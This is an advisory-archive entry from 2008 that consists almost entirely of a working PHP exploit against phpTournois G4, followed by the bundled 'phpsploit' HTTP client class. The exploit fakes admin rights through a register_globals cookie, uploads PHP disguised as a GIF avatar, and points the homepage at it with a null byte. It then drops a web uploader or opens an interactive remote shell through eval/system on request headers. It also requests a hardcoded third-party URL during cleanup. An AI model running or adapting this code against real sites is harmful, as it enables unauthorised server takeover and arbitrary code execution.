phpTournois <= G4 Remote File Upload/Code Execution Exploit

2008-04-08T00:00:00
ID SECURITYVULNS:DOC:19590
Type securityvulns
Reporter Securityvulns
Modified 2008-04-08T00:00:00

Description

<?php / * Name: phpTournois <= G4 Remote File Upload/Code Execution Exploit * Credits: Charles "real" F. <charlesfol[at]hotmail.fr> * Date: 04-06-08 * * -> Remote Code Execution * -> Remote File Upload * * When testing if we are admin, phpTournois checks if $grade['a']=='a'. * But when we are not loggued in, this var is not defined. * So, using register_globals, we can define it and let the CMS think we * are authentificated. * Using configuration zone and avatar upload, we can do a LFI, and then * everything is possible. * /

print "\n"; print " phpTournois <= G4 Remote File Upload/Code Execution Exploit\n"; print " by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";

if($argc<3) { print "usage: php phptn_exploit.php -url <url> [options]\n\n"; print " Options: -mode 0 -> Remote Upload (default)\n"; print " 1 -> Remote Code Execution\n"; print " -proxy If you want to use a proxy.\n"; exit(); }

$url = getparam("url",1); $mode = getparam("mode") ? getparam("mode"): 0; $prx = getparam("proxy");

$xpl = new phpsploit(); if($prx) $xpl->proxy($prx); $xpl->addcookie("grade[a]","a");

/ Code in the fake avatar / if($mode==0) / upload code / { $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(FILE); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>'; $c0de = '<?php'."\n" .'error_reporting(0);' ."if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'".preg_replace("#'#i","\\'",$file_upload_code)."');print 'upfiledone'; }\n" .'include("include/files/accueil.php"); ?>'; } else / shell code / { $c0de = '<?php'."\n" .'error_reporting(0);' .'if(isset($_SERVER[HTTP_SHELL]))' .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' .'include("include/files/accueil.php"); ?>'; }

/ Upload avatar with PHP c0de / print " * uploading avatar\t";

$avatar = array(frmdt_url => $url.'?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif',frmdt_type => 'image/gif',frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999, );

if(preg_match("#location.href='\?page=avatars&id=\d+&mode=J'#i",$xpl->formdata($avatar))) print "done\n"; else die("error\n");

if(preg_match('#<span style="float: right;" ><img src="([^"]+)#i',$xpl->get($url.'?page=joueurs&id=1'),$match)) $img = $match[1]; else die(" * can't find image name\n");

/ Change homepage to our avatar, with a null byte, after saving website name. / print " * changing homepage\t"; preg_match('#name=nomsite value="([^ ]+)"#i',$xpl->get($url.'?page=configuration&op=admin'),$all); $postdata = "nomsite=$all[1]&urlsite=$url&logo=logo.gif&pagestart=../.$img%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="; $xpl->post($url.'?page=configuration&op=modify',$postdata); print "done\n";

$success = true;

if($mode==0) / upload mode / { print " * loading uploader\t"; $xpl->addheader("upload","1"); if(preg_match("#upfiledone#i",$xpl->get($url))) print "done\n"; else {$success=false;print "error\n";} } else / shell mode / { print "\n\$shell> "; while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } }

/ Reinitialize website name and homepage and erase user avatar / print " * repairing homepage\t"; $xpl->get('http://myannu.fr/?page=avatars&op=delete&id=1&mode=J'); $postdata = "nomsite=$all[1]&urlsite=$url&logo=logo.gif&pagestart=accueil&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="; $xpl->post($url.'?page=configuration&op=modify',$postdata); print "done\n";

if($success) print "\n * uploader: ".$url."w00t.php\n";

function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("\n-$param parameter required"); else return; }

/ * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4) * VERSION: 1.2 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * /

class phpsploit {

/**
 * This function is called by the get&#40;&#41;/post&#40;&#41; functions.
 * You don&#39;t have to call it, this is the main function.
 *
 * @return $server_response
 */
private function sock&#40;&#41;
{
    if&#40;!empty&#40;$this-&gt;proxyhost&#41; &amp;&amp; !empty&#40;$this-&gt;proxyport&#41;&#41; $socket = fsockopen&#40;$this-&gt;proxyhost,$this-&gt;proxyport&#41;;
    else $socket = fsockopen&#40;$this-&gt;host,$this-&gt;port&#41;;

    if&#40;!$socket&#41; die&#40;&quot;Error: The host doesn&#39;t exist&quot;&#41;;

    if&#40;$this-&gt;method===&quot;get&quot;&#41; $this-&gt;packet = &quot;GET &quot;.$this-&gt;url.&quot; HTTP/1.1&#92;r&#92;n&quot;;
    elseif&#40;$this-&gt;method===&quot;post&quot; or $this-&gt;method===&quot;formdata&quot;&#41; $this-&gt;packet = &quot;POST &quot;.$this-&gt;url. &quot; HTTP/1.1&#92;r&#92;n&quot;;
    else die&#40;&quot;Error: Invalid method&quot;&#41;;

    if&#40;!empty&#40;$this-&gt;proxyuser&#41;&#41; $this-&gt;packet .= &quot;Proxy-Authorization: Basic &quot;.base64_encode&#40;$this-&gt;proxyuser.&quot;:&quot;.$this-&gt;proxypass&#41;.&quot;&#92;r&#92;n&quot;;
    $this-&gt;packet .= &quot;Host: &quot;.$this-&gt;host.&quot;&#92;r&#92;n&quot;;

    if&#40;!empty&#40;$this-&gt;agent&#41;&#41;  $this-&gt;packet .= &quot;User-Agent: &quot;.$this-&gt;agent.&quot;&#92;r&#92;n&quot;;
    if&#40;!empty&#40;$this-&gt;header&#41;&#41; $this-&gt;packet .= $this-&gt;header.&quot;&#92;r&#92;n&quot;;
    if&#40;!empty&#40;$this-&gt;cookie&#41;&#41; $this-&gt;packet .= &quot;Cookie: &quot;.$this-&gt;cookie.&quot;&#92;r&#92;n&quot;;

    $this-&gt;packet .= &quot;Connection: Close&#92;r&#92;n&quot;;
    if&#40;$this-&gt;method===&quot;post&quot;&#41;
    {
        $this-&gt;packet .= &quot;Content-Type: application/x-www-form-urlencoded&#92;r&#92;n&quot;;
        $this-&gt;packet .= &quot;Content-Length: &quot;.strlen&#40;$this-&gt;data&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
        $this-&gt;packet .= $this-&gt;data.&quot;&#92;r&#92;n&quot;;
    }
    elseif&#40;$this-&gt;method===&quot;formdata&quot;&#41;
    {
        $this-&gt;packet .= &quot;Content-Type: multipart/form-data; boundary=---------------------------&quot;.$this-&gt;boundary.&quot;&#92;r&#92;n&quot;;
        $this-&gt;packet .= &quot;Content-Length: &quot;.strlen&#40;$this-&gt;data&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
        $this-&gt;packet .= $this-&gt;data;
    }
    $this-&gt;packet .= &quot;&#92;r&#92;n&quot;;
    $this-&gt;recv = &#39;&#39;;

    fputs&#40;$socket,$this-&gt;packet&#41;;
    while&#40;!feof&#40;$socket&#41;&#41; $this-&gt;recv .= fgets&#40;$socket&#41;;
    fclose&#40;$socket&#41;;

    if&#40;$this-&gt;cookiejar&#41; $this-&gt;cookiejar&#40;$this-&gt;getheader&#40;$this-&gt;recv&#41;&#41;;
    if&#40;$this-&gt;allowredirection&#41; return $this-&gt;allowredirection&#40;$this-&gt;recv&#41;;
    else return $this-&gt;recv;
}


/**
 * This function allows you to add several cookie in the
 * request. Several methods are supported:
 * 
 * $this-&gt;addcookie&#40;&quot;name&quot;,&quot;value&quot;&#41;;
 * or
 * $this-&gt;addcookie&#40;&quot;name=newvalue&quot;&#41;;
 * or
 * $this-&gt;addcookie&#40;&quot;othername=overvalue; xx=zz; y=u&quot;&#41;;
 * 
 * @param string $cookiename
 * @param string $cookievalue
 * 
 */
public function addcookie&#40;$cookn,$cookv=&#39;&#39;&#41;
{
    // $this-&gt;addcookie&#40;&quot;name&quot;,&quot;value&quot;&#41;; work avec replace
    if&#40;!empty&#40;$cookv&#41;&#41;
    {
        if&#40;$cookv === &quot;deleted&quot;&#41; $cookv=&#39;&#39;; // cookiejar&#40;1&#41; &amp;&amp; Set-Cookie: name=delete
        if&#40;!empty&#40;$this-&gt;cookie&#41;&#41;
        {
            if&#40;preg_match&#40;&quot;/$cookn=/&quot;,$this-&gt;cookie&#41;&#41;
            {
                $this-&gt;cookie = preg_replace&#40;&quot;/$cookn=&#40;&#92;S*&#41;;/&quot;,&quot;$cookn=$cookv;&quot;,$this-&gt;cookie&#41;;
            }
            else
            {
                $this-&gt;cookie .= &quot; &quot;.$cookn.&quot;=&quot;.$cookv.&quot;;&quot;; // &quot; &quot;.
            }
        }
        else
        {
            $this-&gt;cookie = $cookn.&quot;=&quot;.$cookv.&quot;;&quot;;
        }
    }
    // $this-&gt;addcookie&#40;&quot;name=value; othername=othervalue&quot;&#41;;
    else
    {
         if&#40;!empty&#40;$this-&gt;cookie&#41;&#41;
         {
            $cookn = preg_replace&#40;&quot;/&#40;.*&#41;;$/&quot;,&quot;$1&quot;,$cookn&#41;;
            $cookarr = explode&#40;&quot;;&quot;,str_replace&#40;&quot; &quot;, &quot;&quot;,$cookn&#41;&#41;;
            for&#40;$i=0;$i&lt;count&#40;$cookarr&#41;;$i++&#41;
            {
                preg_match&#40;&quot;/&#40;&#92;S*&#41;=&#40;&#92;S*&#41;/&quot;,$cookarr[$i],$matches&#41;;
                $cookn = $matches[1];
                $cookv = $matches[2];
                $this-&gt;addcookie&#40;$cookn,$cookv&#41;;
            }
         }
         else
         {
            $cookn = &#40;&#40;substr&#40;$cookn,&#40;strlen&#40;$cookn&#41;-1&#41;,1&#41;&#41;===&quot;;&quot;&#41; ? $cookn : $cookn.&quot;;&quot;;
            $this-&gt;cookie = $cookn;          
         }
    }
}


/**
 * This function allows you to add several headers in the
 * request. Several methods are supported:
 *
 * $this-&gt;addheader&#40;&quot;headername&quot;,&quot;headervalue&quot;&#41;;
 * or
 * $this-&gt;addheader&#40;&quot;headername: headervalue&quot;&#41;;
 *
 * @param string $headername
 * @param string $headervalue
 */
public function addheader&#40;$headern,$headervalue=&#39;&#39;&#41;
{
    // $this-&gt;addheader&#40;&quot;name&quot;,&quot;value&quot;&#41;;
    if&#40;!empty&#40;$headervalue&#41;&#41;
    {
        if&#40;!empty&#40;$this-&gt;header&#41;&#41;
        {
            if&#40;preg_match&#40;&quot;/$headern:/&quot;,$this-&gt;header&#41;&#41;
            {
                $this-&gt;header = preg_replace&#40;&quot;/$headern: &#40;&#92;S*&#41;/&quot;,&quot;$headern: $headervalue&quot;,$this-&gt;header&#41;;
            }
            else
            {
                $this-&gt;header .= &quot;&#92;r&#92;n&quot;.$headern.&quot;: &quot;.$headervalue;
            }
        }
        else
        {
            $this-&gt;header=$headern.&quot;: &quot;.$headervalue;
        }
    }
    // $this-&gt;addheader&#40;&quot;name: value&quot;&#41;;
    else 
    {
        if&#40;!empty&#40;$this-&gt;header&#41;&#41;
        {
            $headarr = explode&#40;&quot;: &quot;,$headern&#41;;
            $headern = $headarr[0];
            $headerv = $headarr[1];
            $this-&gt;addheader&#40;$headern,$headerv&#41;;
        }
        else
        {
            $this-&gt;header=$headern;
        }
    }
}


/**
 * This function allows you to use an http proxy server.
 * Several methods are supported:
 * 
 * $this-&gt;proxy&#40;&quot;proxyip&quot;,&quot;8118&quot;&#41;;
 * or
 * $this-&gt;proxy&#40;&quot;proxyip:8118&quot;&#41;
 *
 * @param string $proxyhost
 * @param integer $proxyport
 */
public function proxy&#40;$proxy,$proxyp=&#39;&#39;&#41;
{
    // $this-&gt;proxy&#40;&quot;localhost:8118&quot;&#41;;
    if&#40;empty&#40;$proxyp&#41;&#41;
    {
        preg_match&#40;&quot;/^&#40;&#92;S*&#41;:&#40;&#92;d+&#41;$/&quot;,$proxy,$proxarr&#41;;
        $proxh = $proxarr[1];
        $proxp = $proxarr[2];
        $this-&gt;proxyhost=$proxh;
        $this-&gt;proxyport=$proxp;
    }
    // $this-&gt;proxy&#40;&quot;localhost&quot;,8118&#41;;
    else 
    {
        $this-&gt;proxyhost=$proxy;
        $this-&gt;proxyport=intval&#40;$proxyp&#41;;
    }
    if&#40;$this-&gt;proxyport &gt; 65535&#41; die&#40;&quot;Error: Invalid port number&quot;&#41;;
}


/**
 * This function allows you to use an http proxy server
 * which requires a basic authentification. Several
 * methods are supported:
 * 
 * $this-&gt;proxyauth&#40;&quot;darkfig&quot;,&quot;dapasswd&quot;&#41;;
 * or
 * $this-&gt;proxyauth&#40;&quot;darkfig:dapasswd&quot;&#41;;
 *
 * @param string $proxyuser
 * @param string $proxypass
 */
public function proxyauth&#40;$proxyauth,$proxypasse=&#39;&#39;&#41;
{
    // $this-&gt;proxyauth&#40;&quot;darkfig:password&quot;&#41;;
    if&#40;empty&#40;$proxypasse&#41;&#41;
    {
        preg_match&#40;&quot;/^&#40;.*&#41;:&#40;.*&#41;$/&quot;,$proxyauth,$proxautharr&#41;;
        $proxu = $proxautharr[1];
        $proxp = $proxautharr[2];
        $this-&gt;proxyuser=$proxu;
        $this-&gt;proxypass=$proxp;
    }
    // $this-&gt;proxyauth&#40;&quot;darkfig&quot;,&quot;password&quot;&#41;;
    else
    {
        $this-&gt;proxyuser=$proxyauth;
        $this-&gt;proxypass=$proxypasse;
    }
}


/**
 * This function allows you to set the &quot;User-Agent&quot; header.
 * Several methods are possible to do that:
 * 
 * $this-&gt;agent&#40;&quot;Mozilla Firefox&quot;&#41;;
 * or
 * $this-&gt;addheader&#40;&quot;User-Agent: Mozilla Firefox&quot;&#41;;
 * or
 * $this-&gt;addheader&#40;&quot;User-Agent&quot;,&quot;Mozilla Firefox&quot;&#41;;
 * 
 * @param string $useragent
 */
public function agent&#40;$useragent&#41;
{
    $this-&gt;agent=$useragent;
}


/**
 * This function returns the header which will be
 * in the next request.
 * 
 * $this-&gt;showheader&#40;&#41;;
 *
 * @return $header
 */
public function showheader&#40;&#41;
{
    return $this-&gt;header;
}


/**
 * This function returns the cookie which will be
 * in the next request.
 * 
 * $this-&gt;showcookie&#40;&#41;;
 *
 * @return $storedcookies
 */
public function showcookie&#40;&#41;
{
    return $this-&gt;cookie;
}


/**
 * This function returns the last formed
 * http request &#40;the http packet&#41;.
 * 
 * $this-&gt;showlastrequest&#40;&#41;;
 * 
 * @return $last_http_request
 */
public function showlastrequest&#40;&#41;
{
    return $this-&gt;packet;
}


/**
 * This function sends the formed http packet with the
 * GET method. You can precise the port of the host.
 * 
 * $this-&gt;get&#40;&quot;http://localhost&quot;&#41;;
 * $this-&gt;get&#40;&quot;http://localhost:888/xd/tst.php&quot;&#41;;
 * 
 * @param string $urlwithpath
 * @return $server_response
 */
public function get&#40;$url&#41;
{
    $this-&gt;target&#40;$url&#41;;
    $this-&gt;method=&quot;get&quot;;
    return $this-&gt;sock&#40;&#41;;
}


/**
 * This function sends the formed http packet with the
 * POST method. You can precise the port of the host.
 * 
 * $this-&gt;post&#40;&quot;http://localhost/index.php&quot;,&quot;admin=1&amp;user=dark&quot;&#41;;
 *
 * @param string $urlwithpath
 * @param string $postdata
 * @return $server_response
 */ 
public function post&#40;$url,$data&#41;
{
    $this-&gt;target&#40;$url&#41;;
    $this-&gt;method=&quot;post&quot;;
    $this-&gt;data=$data;
    return $this-&gt;sock&#40;&#41;;
}


/**
 * This function sends the formed http packet with the
 * POST method using the multipart/form-data enctype. 
 * 
 * $array = array&#40;
 *          frmdt_url      =&gt; &quot;http://localhost/upload.php&quot;,
 *          frmdt_boundary =&gt; &quot;123456&quot;,                    # Optional
 *                 &quot;email&quot; =&gt; &quot;me@u.com&quot;,
 *               &quot;varname&quot; =&gt; array&#40;
 *                            frmdt_type =&gt; &quot;image/gif&quot;,   # Optional
 *                       frmdt_transfert =&gt; &quot;binary&quot;,      # Optional
 *                        frmdt_filename =&gt; &quot;hello.php&quot;,
 *                         frmdt_content =&gt; &quot;&lt;?php echo &#39;:&#41;&#39;; ?&gt;&quot;&#41;&#41;;
 * $this-&gt;formdata&#40;$array&#41;;
 *
 * @param array $array
 * @return $server_response
 */
public function formdata&#40;$array&#41;
{
    $this-&gt;target&#40;$array[frmdt_url]&#41;;
    $this-&gt;method=&quot;formdata&quot;;
    $this-&gt;data=&#39;&#39;;
    if&#40;!isset&#40;$array[frmdt_boundary]&#41;&#41; $this-&gt;boundary=&quot;phpsploit&quot;;
    else $this-&gt;boundary=$array[frmdt_boundary];
    foreach&#40;$array as $key =&gt; $value&#41;
    {
        if&#40;!preg_match&#40;&quot;#^frmdt_&#40;boundary|url&#41;#&quot;,$key&#41;&#41;
        {
            $this-&gt;data .= &quot;-----------------------------&quot;.$this-&gt;boundary.&quot;&#92;r&#92;n&quot;;
            $this-&gt;data .= &quot;Content-Disposition: form-data; name=&#92;&quot;&quot;.$key.&quot;&#92;&quot;;&quot;;
            if&#40;!is_array&#40;$value&#41;&#41;
            {
                $this-&gt;data .= &quot;&#92;r&#92;n&#92;r&#92;n&quot;.$value.&quot;&#92;r&#92;n&quot;;
            }
            else
            {
                $this-&gt;data .= &quot; filename=&#92;&quot;&quot;.$array[$key][frmdt_filename].&quot;&#92;&quot;;&#92;r&#92;n&quot;;
                if&#40;isset&#40;$array[$key][frmdt_type]&#41;&#41; $this-&gt;data .= &quot;Content-Type: &quot;.$array[$key][frmdt_type].&quot;&#92;r&#92;n&quot;;
                if&#40;isset&#40;$array[$key][frmdt_transfert]&#41;&#41; $this-&gt;data .= &quot;Content-Transfer-Encoding: &quot;.$array[$key][frmdt_transfert].&quot;&#92;r&#92;n&quot;;
                $this-&gt;data .= &quot;&#92;r&#92;n&quot;.$array[$key][frmdt_content].&quot;&#92;r&#92;n&quot;;
            }
        }
    }
    $this-&gt;data .= &quot;-----------------------------&quot;.$this-&gt;boundary.&quot;--&#92;r&#92;n&quot;;
    return $this-&gt;sock&#40;&#41;;
}


/**
 * This function returns the content of the server response
 * without the headers.
 * 
 * $this-&gt;getcontent&#40;$this-&gt;get&#40;&quot;http://localhost/&quot;&#41;&#41;;
 * or
 * $this-&gt;getcontent&#40;&#41;;
 *
 * @param string $server_response
 * @return $onlythecontent
 */
public function getcontent&#40;$code=&#39;&#39;&#41;
{
    if&#40;empty&#40;$code&#41;&#41; $code = $this-&gt;recv;
    $content = explode&#40;&quot;&#92;n&quot;,$code&#41;;
    $onlycode = &#39;&#39;;
    for&#40;$i=1;$i&lt;count&#40;$content&#41;;$i++&#41;
    {
        if&#40;!preg_match&#40;&quot;/^&#40;&#92;S*&#41;:/&quot;,$content[$i]&#41;&#41; $ok = 1;
        if&#40;$ok&#41; $onlycode .= $content[$i].&quot;&#92;n&quot;;
    }
    return $onlycode;
}


/**
 * This function returns the headers of the server response
 * without the content.
 * 
 * $this-&gt;getheader&#40;$this-&gt;post&#40;&quot;http://localhost/x.php&quot;,&quot;x=1&amp;z=2&quot;&#41;&#41;;
 * or
 * $this-&gt;getheader&#40;&#41;;
 *
 * @param string $server_response
 * @return $onlytheheaders
 */
public function getheader&#40;$code=&#39;&#39;&#41;
{
    if&#40;empty&#40;$code&#41;&#41; $code = $this-&gt;recv;
    $header = explode&#40;&quot;&#92;n&quot;,$code&#41;;
    $onlyheader = $header[0].&quot;&#92;n&quot;;
    for&#40;$i=1;$i&lt;count&#40;$header&#41;;$i++&#41;
    {
        if&#40;!preg_match&#40;&quot;/^&#40;&#92;S*&#41;:/&quot;,$header[$i]&#41;&#41; break;
        $onlyheader .= $header[$i].&quot;&#92;n&quot;;
    }
    return $onlyheader;
}


/**
 * This function is called by the cookiejar&#40;&#41; function.
 * It adds the value of the &quot;Set-Cookie&quot; header in the &quot;Cookie&quot;
 * header for the next request. You don&#39;t have to call it.
 * 
 * @param string $server_response
 */
private function getcookie&#40;$code&#41;
{
    $carr = explode&#40;&quot;&#92;n&quot;,str_replace&#40;&quot;&#92;r&#92;n&quot;,&quot;&#92;n&quot;,$code&#41;&#41;;
    for&#40;$z=0;$z&lt;count&#40;$carr&#41;;$z++&#41;
    {
        if&#40;preg_match&#40;&quot;/set-cookie: &#40;.*&#41;/i&quot;,$carr[$z],$cookarr&#41;&#41;
        {
            $cookie[] = preg_replace&#40;&quot;/expires=&#40;.*&#41;&#40;GMT||UTC&#41;&#40;&#92;S*&#41;$/i&quot;,&quot;&quot;,preg_replace&#40;&quot;/path=&#40;.*&#41;/i&quot;,&quot;&quot;,$cookarr[1]&#41;&#41;;
        }
    }

    for&#40;$i=0;$i&lt;count&#40;$cookie&#41;;$i++&#41;
    {
        preg_match&#40;&quot;/&#40;&#92;S*&#41;=&#40;&#92;S*&#41;&#40;|;&#41;/&quot;,$cookie[$i],$matches&#41;;
                $cookn = $matches[1];
                $cookv = $matches[2];
                $this-&gt;addcookie&#40;$cookn,$cookv&#41;;
    }
}


/**
 * This function is called by the get&#40;&#41;/post&#40;&#41; functions.
 * You don&#39;t have to call it.
 *
 * @param string $urltarg
 */
private function target&#40;$urltarg&#41;
{
    if&#40;!preg_match&#40;&quot;/^http:&#92;/&#92;/&#40;.*&#41;&#92;//&quot;,$urltarg&#41;&#41; $urltarg .= &quot;/&quot;;
    $this-&gt;url=$urltarg;

    $array = explode&#40;&quot;/&quot;,str_replace&#40;&quot;http://&quot;,&quot;&quot;,preg_replace&#40;&quot;/:&#40;&#92;d+&#41;/&quot;,&quot;&quot;,$urltarg&#41;&#41;&#41;;
    $this-&gt;host=$array[0];

    preg_match&#40;&quot;/:&#40;&#92;d+&#41;&#92;//&quot;,$urltarg,$matches&#41;;
    $this-&gt;port=empty&#40;$matches[1]&#41; ? 80 : $matches[1];

    $temp = str_replace&#40;&quot;http://&quot;,&quot;&quot;,preg_replace&#40;&quot;/:&#40;&#92;d+&#41;/&quot;,&quot;&quot;,$urltarg&#41;&#41;;
    preg_match&#40;&quot;/&#92;/&#40;.*&#41;&#92;//&quot;,$temp,$matches&#41;;
    $this-&gt;path=str_replace&#40;&quot;//&quot;,&quot;/&quot;,&quot;/&quot;.$matches[1].&quot;/&quot;&#41;;

    if&#40;$this-&gt;port &gt; 65535&#41; die&#40;&quot;Error: Invalid port number&quot;&#41;;
}


/**
 * If you call this function, the script will
 * extract all &quot;Set-Cookie&quot; headers values
 * and it will automatically add them into the &quot;Cookie&quot; header
 * for all next requests.
 *
 * $this-&gt;cookiejar&#40;1&#41;; // enabled
 * $this-&gt;cookiejar&#40;0&#41;; // disabled
 * 
 */
public function cookiejar&#40;$code&#41;
{
    if&#40;$code===0&#41; $this-&gt;cookiejar=&#39;&#39;;
    if&#40;$code===1&#41; $this-&gt;cookiejar=1;
    else
    {
        $this-&gt;getcookie&#40;$code&#41;;
    }
}


/**
 * If you call this function, the script will
 * follow all redirections sent by the server.
 * 
 * $this-&gt;allowredirection&#40;1&#41;; // enabled
 * $this-&gt;allowredirection&#40;0&#41;; // disabled
 * 
 * @return $this-&gt;get&#40;$locationresponse&#41;
 */
public function allowredirection&#40;$code&#41;
{
    if&#40;$code===0&#41; $this-&gt;allowredirection=&#39;&#39;;
    if&#40;$code===1&#41; $this-&gt;allowredirection=1;
    else
    {
        if&#40;preg_match&#40;&quot;/&#40;location|content-location|uri&#41;: &#40;.*&#41;/i&quot;,$code,$codearr&#41;&#41;
        {
            $location = str_replace&#40;chr&#40;13&#41;,&#39;&#39;,$codearr[2]&#41;;
            if&#40;!eregi&#40;&quot;://&quot;,$location&#41;&#41;
            {
                return $this-&gt;get&#40;&quot;http://&quot;.$this-&gt;host.$this-&gt;path.$location&#41;;
            }
            else
            {
                return $this-&gt;get&#40;$location&#41;;
            }
        }
        else
        {
            return $code;
        }
    }
}


/**
 * This function allows you to reset some parameters:
 * 
 * $this-&gt;reset&#40;header&#41;; // headers cleaned
 * $this-&gt;reset&#40;cookie&#41;; // cookies cleaned
 * $this-&gt;reset&#40;&#41;;       // clean all parameters
 *
 * @param string $func
 */
public function reset&#40;$func=&#39;&#39;&#41;
{
    switch&#40;$func&#41;
    {
        case &quot;header&quot;:
        $this-&gt;header=&#39;&#39;;
        break;

        case &quot;cookie&quot;:
        $this-&gt;cookie=&#39;&#39;;
        break;

        default:
            $this-&gt;cookiejar=&#39;&#39;;
            $this-&gt;header=&#39;&#39;;
            $this-&gt;cookie=&#39;&#39;;
            $this-&gt;allowredirection=&#39;&#39;; 
            $this-&gt;agent=&#39;&#39;;
            break;
    }
}

} ?>